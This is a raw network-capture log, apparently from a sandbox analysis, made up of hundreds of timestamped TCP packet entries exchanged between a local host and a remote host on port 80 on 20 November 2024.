                                                                                        Nov 20, 2024 07:53:13.069449902 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.069458961 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.069462061 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.069499969 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.069539070 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.069550991 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.069556952 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.069596052 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.069606066 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.069627047 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.069644928 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.069655895 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.069663048 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.069668055 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.069693089 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.069902897 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.069915056 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.069926023 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.069936991 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.069948912 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.069948912 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.069961071 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.069972992 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.069983959 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.069988012 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.069996119 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070005894 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.070010900 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070023060 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070035934 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070046902 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.070070028 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070075035 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.070105076 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.070157051 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070168972 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070180893 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070192099 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070204020 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070209026 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.070216894 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070234060 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.070249081 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070254087 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.070261955 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070272923 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070286036 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070297956 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.070298910 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070311069 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070322037 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070339918 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.070367098 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.070540905 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070553064 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070564985 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070590973 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.070594072 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070607901 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070620060 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070622921 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.070632935 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070643902 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070651054 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.070660114 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070679903 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.070696115 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.070827961 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070841074 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070852995 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.070877075 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.070992947 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071012974 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071023941 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071032047 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.071037054 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071048021 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071059942 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071063042 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.071072102 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071084023 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071090937 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.071095943 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071108103 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071111917 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.071120977 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071132898 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071135998 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.071146011 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071157932 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071161985 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.071171045 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071197033 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.071213961 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.071563005 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071588993 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071600914 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071613073 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071624041 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071629047 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.071636915 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071649075 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071655989 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.071664095 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071674109 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.071676016 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071701050 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.071705103 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071717978 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071728945 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071743011 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071753979 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.071759939 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.071782112 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.071794987 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.073395014 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.115355968 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.115427971 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.115439892 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.115452051 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.115463972 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.115483999 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.115495920 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.115508080 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.115684032 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.115684032 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.156328917 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.156392097 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.156480074 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.156528950 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.156538010 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.156574011 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.156600952 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.156651974 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.156696081 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.156738043 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.156773090 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.156805992 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.156853914 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.156861067 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.156896114 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.156929970 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.156944990 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.156965017 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157000065 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157011986 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.157047987 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.157102108 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157138109 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157170057 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157200098 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.157208920 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157243013 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157274961 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157290936 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.157309055 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157319069 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.157344103 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157377005 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157383919 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.157485962 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157562971 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157609940 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.157615900 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157651901 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157685995 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157701015 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.157721043 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157735109 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.157756090 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157788992 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157821894 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157831907 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.157856941 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157867908 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.157891989 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157927036 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157933950 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.157960892 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157994032 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158001900 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.158143997 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158193111 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158226967 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158247948 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.158261061 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158276081 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.158294916 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158328056 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158360958 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158373117 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.158395052 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158409119 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.158430099 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158463001 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158508062 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.158518076 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158574104 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158616066 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.158675909 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158718109 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.158725977 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158761024 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158792973 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158812046 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.158832073 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158864975 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158898115 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158909082 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.158931017 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158941031 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.158966064 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158998013 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159012079 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159032106 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159065008 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159075022 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159099102 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159132004 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159141064 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159167051 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159199953 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159233093 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159255981 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159265995 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159276962 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159300089 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159339905 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159353018 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159387112 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159419060 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159454107 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159467936 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159490108 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159495115 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159527063 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159559965 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159574986 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159593105 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159636974 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159645081 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159673929 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159707069 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159718990 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159742117 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159775972 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159809113 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159820080 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159845114 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159851074 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159879923 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159913063 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159925938 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159946918 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159982920 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159991980 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.160017967 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160052061 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160084009 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160094976 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.160120964 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160155058 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160164118 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.160185099 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160193920 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.160219908 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160252094 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160267115 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.160285950 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160320044 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160351992 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160362005 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.160386086 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160396099 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.160419941 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160456896 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160463095 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.160490990 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160526037 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160541058 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.202384949 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.202445984 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.202456951 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.202469110 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.202481031 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.202492952 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.202507019 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.202524900 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.202574015 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.242918015 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243063927 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243077040 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243088961 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243099928 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243112087 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243139982 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243158102 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243169069 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243187904 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243200064 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243211031 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243221998 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243232965 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243243933 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243257999 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243269920 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243282080 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243292093 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243304968 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243302107 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243302107 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243302107 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243371964 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243371964 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243371964 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243372917 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243566990 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243578911 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243607998 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243619919 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243627071 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243630886 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243645906 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243657112 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243662119 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243669987 CET8049707216.172.172.178192.168.2.8
